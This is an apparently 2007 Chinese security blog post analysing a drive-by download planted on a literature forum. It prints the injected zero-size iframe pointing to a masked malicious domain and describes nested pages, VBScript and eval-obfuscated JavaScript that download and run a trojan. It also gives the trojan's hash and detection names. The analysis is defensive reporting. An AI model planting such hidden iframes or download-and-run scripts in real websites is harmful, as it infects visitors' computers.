某文学论坛被挂马 Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avt

简介: 某文学论坛被挂马 Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avt

Google了一下,发现Google已经标注了:该网站可能含有恶意软件,有可能会危害您的电脑。

检查论坛的网页代码,被加入:

/---
<iframe src='hxxp://a**aa.3*6**96**78.cn/xiaoyu.htm' width=0 height=0>
---/
hxxp://a**aa.3*6**96**78.cn/xiaoyu.htm 内容为:
/---
<iframe width='100' height='100' src='Webxl.htm'></iframe>
<iframe width='100' height='100' src='wm/wm1.htm'></iframe>
<iframe width='100' height='100' src='wm/wm2.htm'></iframe>
<iframe width='100' height='100' src='wm/vip.htm'></iframe>
<iframe width='100' height='100' src='wm/wm3.htm'></iframe>
---/

hxxp://a**aa.3*6**96**78.cn/Webxl.htm 未能打开。

hxxp://a**aa.3*6**96**78.cn/wm/vip.htm 用自定义函数解密 变量 loveVip 的值,其值为VBScript代码,功能是下载 vip.exe 并运行。

文件说明符 : D:/test/vip.exe

属性 : A---

获取文件版本信息大小失败!

创建时间 : 2007-8-17 21:20:8

修改时间 : 2007-8-17 21:20:10

访问时间 : 2007-8-17 0:0:0

大小 : 19107 字节 18.675 KB

MD5 : 8fe4a48341fb6fea12df42845db2d229

Kaspersky 报为 Trojan.Win32.Agent.avt,瑞星 报为 Worm.Win32.Agent.ipi

hxxp://a**aa.3*6**96**78.cn/wm/wm1.htm 未能打开。

hxxp://a**aa.3*6**96**78.cn/wm/wm2.htm 包含代码:

/---
<script src=000614.js></script>
---/
000614.js 内容为:
/---
eval("\146\165\156…(略)…\73\175")
---/

解密后为 JavaScript 脚本,功能下载 hxxp://d***dd.3*6**96**78.cn/window.exe。

window.exe 与 vip.exe 相同。

hxxp://a**aa.3*6**96**78.cn/wm/wm3.htm 包含JavaScript脚本,功能是检查名为 woshi07004 的 Cookies 是否存在,若不存在则创建,并运行 溢出代码。  


目录
打赏
0
2
2
0
57
分享
相关文章
文学论坛挂的马换 成 Worm.Win32.Agent.imh 了
文学论坛挂的马换 成 Worm.Win32.Agent.imh 了
某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu
某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu
某笑话网站挂马Trojan-Downloader.Win32.Agent.rub
某笑话网站挂马Trojan-Downloader.Win32.Agent.rub
某易论坛被植入利用ANI漏洞传播 Backdoor.Win32.Agent.ahj 的代码
某易论坛被植入利用ANI漏洞传播 Backdoor.Win32.Agent.ahj 的代码
Gemini 2.0:谷歌推出的原生多模态输入输出 + Agent 为核心的 AI 模型
谷歌最新推出的Gemini 2.0是一款原生多模态输入输出的AI模型,以Agent技术为核心,支持多种数据类型的输入与输出,具备强大的性能和多语言音频输出能力。本文将详细介绍Gemini 2.0的主要功能、技术原理及其在多个领域的应用场景。
491 20
Gemini 2.0:谷歌推出的原生多模态输入输出 + Agent 为核心的 AI 模型
TEN Agent:开源的实时多模态 AI 代理框架,支持语音、文本和图像的实时通信交互
TEN Agent 是一个开源的实时多模态 AI 代理框架,集成了 OpenAI Realtime API 和 RTC 技术,支持语音、文本和图像的多模态交互,具备实时通信、模块化设计和多语言支持等功能,适用于智能客服、实时语音助手等多种场景。
285 15
TEN Agent:开源的实时多模态 AI 代理框架,支持语音、文本和图像的实时通信交互
Director:构建视频智能体的 AI 框架,用自然语言执行搜索、编辑、合成和生成等复杂视频任务
Director 是一个构建视频智能体的 AI 框架,用户可以通过自然语言命令执行复杂的视频任务,如搜索、编辑、合成和生成视频内容。该框架基于 VideoDB 的“视频即数据”基础设施,集成了多个预构建的视频代理和 AI API,支持高度定制化,适用于开发者和创作者。
153 9
Director:构建视频智能体的 AI 框架,用自然语言执行搜索、编辑、合成和生成等复杂视频任务
Meta Motivo:Meta 推出能够控制数字智能体动作的 AI 模型,提升元宇宙互动体验的真实性
Meta Motivo 是 Meta 公司推出的 AI 模型,旨在控制数字智能体的全身动作,提升元宇宙体验的真实性。该模型通过无监督强化学习算法,能够实现零样本学习、行为模仿与生成、多任务泛化等功能,适用于机器人控制、虚拟助手、游戏角色动画等多个应用场景。
129 4
Meta Motivo:Meta 推出能够控制数字智能体动作的 AI 模型,提升元宇宙互动体验的真实性
Agent-E:基于 AutoGen 代理框架构建的 AI 浏览器自动化系统
Agent-E 是一个基于 AutoGen 代理框架构建的智能自动化系统,专注于浏览器内的自动化操作。它能够执行多种复杂任务,如填写表单、搜索和排序电商产品、定位网页内容等,从而提高在线效率,减少重复劳动。本文将详细介绍 Agent-E 的功能、技术原理以及如何运行该系统。
307 5
Agent-E:基于 AutoGen 代理框架构建的 AI 浏览器自动化系统
AI经营|多Agent择优生成商品标题
商品标题中关键词的好坏是商品能否被主搜检索到的关键因素,使用大模型自动优化标题成为【AI经营】中的核心能力之一,本文讲述大模型如何帮助商家优化商品素材,提升商品竞争力。
435 13
AI经营|多Agent择优生成商品标题
AI助理

你好,我是AI助理

可以解答问题、推荐解决方案等